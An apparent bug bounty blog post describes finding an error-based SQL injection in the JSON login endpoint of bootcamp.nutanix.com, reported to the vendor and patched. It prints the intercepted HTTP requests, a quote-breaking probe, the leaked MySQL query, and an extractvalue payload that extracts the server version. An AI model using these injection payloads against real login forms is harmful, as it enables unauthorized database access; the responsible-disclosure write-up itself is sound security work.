SQL Injection Vulnerability bootcamp.nutanix.com | Bug Bounty POC

Hey Guys,

 

So Another Concise Report about an SQLi I recently Found One day i was just going through some Twitter posts and saw one of my friend replied to a tweet about a Swag pack

 

As Some of you guys already know How Attractive such Tweets are so i decided to Test the Site that give him that Awesome Swag Pack

 

So While Scanning Subdomains I saw an interesting subdomain that was http://bootcamp.nutanix.com/ and the subdomain had a Login Page

 

 

At First i tried Different Combinations to see if i can get access to the panel but i wasn’t that lucky but i didn’t find anything…. So I decided to see if any other Vulnerability exists that i can use to Login or either get some sensitive information from the site

So i fired Up Burp And at first send a random Email and password and captured the request it was similar to this

 

POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


{“email”:”Email@email.com“,”password”:”passwordlol”}

 

The Response of this was Invalid Username and Password. So Then I started Monitoring the Reposine of the Request Using Burp repeater whenever i change something in the request first i thought of getting an SQLi in the Headers but that didn’t work but then i added a simple 1’\ to the Email Field the Response of this Request was Different from all of them It was a 500 Internal Server Error and Same Error when we put this on Password Parameter because that was Also vulnerable .

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 301
ETag: W/”12d-ZLo463k+S1SW5Z9MTAnhrr4EGvI”
Date: Mon, 16 Jul 2018 18:20:13 GMT
Connection: keep-alive


{“code”:”ER_PARSE_ERROR”,”errno”:1064,”sqlMessage”:”You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”\”‘ at line 1″,”sqlState”:”42000″,”index”:0,”sql”:”SELECT id from Users WHERE email=\”1’\”\” AND password=\”‘\””}

 

So This was indeed a surprise for me and was also fun to see the error after so many tries. Now the Next Part was to see if the SQLi is Exploitable any further ot not

 

POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


{“email”:”a\”and(extractvalue(1,concat(0x0a,@@version)))#”,”password”:”‘”}

and this Gave an Output as expected

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/”e3-FF7tF7d8MmsLPb6vtq6tjDeVHHk”
Date: Mon, 16 Jul 2018 18:23:09 GMT
Connection: keep-alive


{“code”:”ER_UNKNOWN_ERROR”,”errno”:1105,”sqlMessage”:”XPATH syntax error: ‘\n8.0.11′”,”sqlState”:”HY000″,”index”:0,”sql”:”SELECT id from Users WHERE email=\”a\”and(extractvalue(1,concat(0x0a,@@version)))#\” AND password=\”‘\””}

 

At This Point Most of the People Report the issue but i thought i should test a bit further to show a better POC than this one so here’s another SS that i used to check it manually more

 

At This Point I simply Put the POST request to SQLmap and the OutPut was

 

 

I reported this Issue to the Security Team at security@nutanix.com and they Quickly Patched the issue and Yayyyyeeee I was Awarded with an Awesome Swag Pack that is still In Transit xD also Special thanks to Mani Sir He Always Helps Me whenever i need help or guide related to something 👌

 

Thanks for Reading Guys 🙂

About the Author

Muhammad Khizer Javed

Ethical Hacker, Bug Bounty Hunter/ Pentester & Gamer

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: